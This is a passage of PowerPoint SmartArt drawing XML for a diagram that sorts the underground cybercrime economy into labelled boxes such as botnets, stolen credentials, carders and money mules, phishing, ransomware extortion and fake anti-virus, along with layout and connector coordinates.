          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650"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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770"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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158"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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278"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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="7431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BD6A2-C6A6-4AE7-8716-F62AC787B4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="1616471" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471"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CAA67D-ED33-4120-9634-DF98516FB005}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="97152" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152"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B922D2-A971-46B6-8A66-A63871EC5D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="2876130" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2876130" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="287613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64DF9C-47B4-4930-BF8C-FB83C56F57E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="1429867" cy="433494"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="433494"/>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97DC07-675E-4CF3-9913-C7CB3E6FE0DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6545551" y="3955063"/>
          <a:ext cx="162507" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="162507" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="162507"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3BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146"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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444"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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650"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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770"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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
